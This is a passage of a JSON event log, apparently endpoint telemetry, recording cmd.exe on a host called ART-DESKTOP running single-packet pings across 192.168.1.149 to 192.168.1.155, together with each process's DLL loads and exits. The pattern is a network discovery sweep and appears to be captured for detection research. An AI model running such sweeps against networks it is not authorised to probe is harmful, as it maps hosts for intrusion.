- "timestamp": 131883572711840000, - "unique_pid": "{42FC7E13-CB96-5C05-0000-0010B5FD5201}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.149", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 688, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572711980000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572711980000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572711980000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572711980000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572711980000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572711980000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572711980000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572711980000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572711980000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572711980000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572711980000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572711980000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" - }, - { - "event_type": "process", - "pid": 688, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572716990000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-00102B005301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.150", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2388, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572717140000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 2388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572717140000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572717140000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572717140000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572717140000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572717140000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572717140000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572717140000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572717140000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 2388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572717300000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572717300000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572717300000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" - }, - { - "event_type": "process", - "pid": 2388, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572721830000, - "unique_pid": "{42FC7E13-CB97-5C05-0000-0010A8025301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.151", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6428, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572721980000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572721980000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572721980000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572721980000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572721980000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572721980000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572721980000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572721980000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572721980000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572721980000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572721980000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572721980000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" - }, - { - "event_type": "process", - "pid": 6428, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572726840000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-00101B055301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.152", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6132, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572726980000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6132, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572726990000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6132, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572726990000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6132, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572726990000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6132, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572726990000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6132, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572726990000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6132, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572726990000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6132, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572726990000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6132, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572726990000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6132, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572726990000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6132, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572726990000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6132, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572726990000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" - }, - { - "event_type": "process", - "pid": 6132, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572731990000, - "unique_pid": "{42FC7E13-CB98-5C05-0000-001099075301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.153", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1988, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572732140000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572732140000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572732140000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572732140000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572732140000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572732140000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572732140000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572732140000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572732140000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572732140000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572732140000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572732140000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" - }, - { - "event_type": "process", - "pid": 1988, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572736830000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00100A0A5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.154", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5184, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572736980000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572736980000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572736980000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572736980000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572736980000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572736980000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572736980000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572736980000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572736980000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572736980000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572736980000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572736980000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}" - }, - { - "event_type": "process", - "pid": 5184, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572741990000, - "unique_pid": "{42FC7E13-CB99-5C05-0000-00108B0C5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.155", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7216, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572742140000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572742140000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572742140000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572742140000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572742140000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572742140000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572742140000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572742140000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572742140000, - "unique_pid": "{42FC7E13-CB9A-5C05-0000-0010FB0E5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7216, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572742140000, - 